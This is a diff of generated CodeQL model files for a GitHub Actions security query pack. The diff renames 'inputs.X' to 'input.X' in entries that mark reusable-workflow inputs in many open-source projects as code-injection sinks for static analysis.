5a53b788312..3a14f6a879d 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "inputs.package", "code-injection", "generated"] \ No newline at end of file + - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index 579e295213b..c7f84e83db5 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file + - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index bc8133b907c..72383be71ca 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.test_timeout", "code-injection", "generated"] - - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.log_level", "code-injection", "generated"] - - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.bin_name", "code-injection", "generated"] - - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.has_ffi", "code-injection", "generated"] \ No newline at end of file + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.log_level", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "input.bin_name", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "input.has_ffi", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 232c6abb3f3..8b05adf053e 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml 
@@ -3,17 +3,17 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.triggered_by_callable", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.package_version_number", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.base_branch", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.cpp_release_version", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.platforms", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.runIntegrationTests", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.working_branch", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.release_label", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.create_new_branch", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_windows.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_tvos.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_macos.yml", "*", "inputs.apis", "code-injection", "generated"] - - ["firebase/firebase-unity-sdk/.github/workflows/build_linux.yml", "*", "inputs.apis", "code-injection", "generated"] \ No newline at end of file + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", 
"input.triggered_by_callable", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.package_version_number", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.base_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.cpp_release_version", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.platforms", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.runIntegrationTests", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.working_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.release_label", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "input.create_new_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_windows.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_tvos.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_macos.yml", "*", "input.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_linux.yml", "*", "input.apis", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 8a7d3c60c45..9eec959ade3 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "inputs.monorepo_tests", "code-injection", "generated"] \ No newline at end of file + - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index a1e523d92ce..835301ecc73 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "inputs.unstable", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file + - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.binary_name_stem", "code-injection", 
"generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "input.runner", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_vscode_ext.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_sdk.yml", "*", "input.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 22729c980de..9a99588239e 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "inputs.pattern", "code-injection", "generated"] \ No newline at end of file + - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index e242d38bdbe..12c370b33ad 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "inputs.before-build", "code-injection", "generated"] - - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "inputs.component", "code-injection", "generated"] - - ["flyteorg/flyte/.github/workflows/component_docker_build.yml", "*", "inputs.component", "code-injection", "generated"] \ No newline at end of file + - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "input.component", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/component_docker_build.yml", "*", "input.component", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index f9c6658f5b8..0e03216fc69 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.org", "code-injection", "generated"] - - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.solution", "code-injection", "generated"] - - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.compose-command", "code-injection", "generated"] \ No newline at end of file + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.solution", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.compose-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 798c6bcc37a..081378c9617 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "inputs.previousSteps", "code-injection", "generated"] \ No newline at end of file + - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index 687db46824a..fcd9c292901 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.output-path", "code-injection", "generated"] - - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.settings", "code-injection", "generated"] - - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.requirements", "code-injection", "generated"] \ No newline at end of file + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.settings", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.requirements", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 8a13569af7c..19822c29fcd 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "inputs.registry", "code-injection", "generated"] \ No newline at end of file + - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index 453eb862b94..d0ccde698b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.panaThreshold", "code-injection", "generated"] - - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.sdk", "code-injection", "generated"] \ No newline at end of file + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.sdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index 37074688f17..027da83e922 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "inputs.target", "code-injection", "generated"] - - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file + - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] + - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index 2e1835cadca..a914aa631c3 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "inputs.productId", "code-injection", "generated"] \ No newline at end of file + - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index 924f5eb157c..d0fe6b0eff5 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 1244f76cbf1..3d3a4de2946 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 94c6c81d33e..4c58af6969d 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.path", "code-injection", "generated"] - - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index c5f5fc4b29d..8629f279891 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index 506dd2b9fee..4a6bbd77ec9 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index 4a81c585259..c22998ee52a 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.build-version", "code-injection", "generated"] - - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.wave-app-name", "code-injection", "generated"] - - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.working-directory", "code-injection", "generated"] \ No newline at end of file + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.wave-app-name", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.working-directory", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index d62c86e1129..c74922e61dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.dry-run", "code-injection", "generated"] - - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 8aedf9000a0..169094c3eb3 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "inputs.artifact-name", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index b14f14538b8..6e4e4f4f1e9 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.package-names-command", "code-injection", "generated"] - - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.go-test-flags", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index 3129cac8979..dbc26ef9f04 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "inputs.package", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitUser", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitEmail", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.providerFqn", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelConversionsPerDocument", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelFileConversions", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.languages", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.cdktfRegistryDocsVersion", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.files", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.maxRunners", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitUser", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitEmail", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.providerFqn", "code-injection", "generated"] + - 
["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.parallelConversionsPerDocument", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.parallelFileConversions", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.languages", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.cdktfRegistryDocsVersion", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.files", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.maxRunners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index a23f69909c7..c69de7cfcc2 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "inputs.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index cd91f58c7ec..685b0b144c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml 
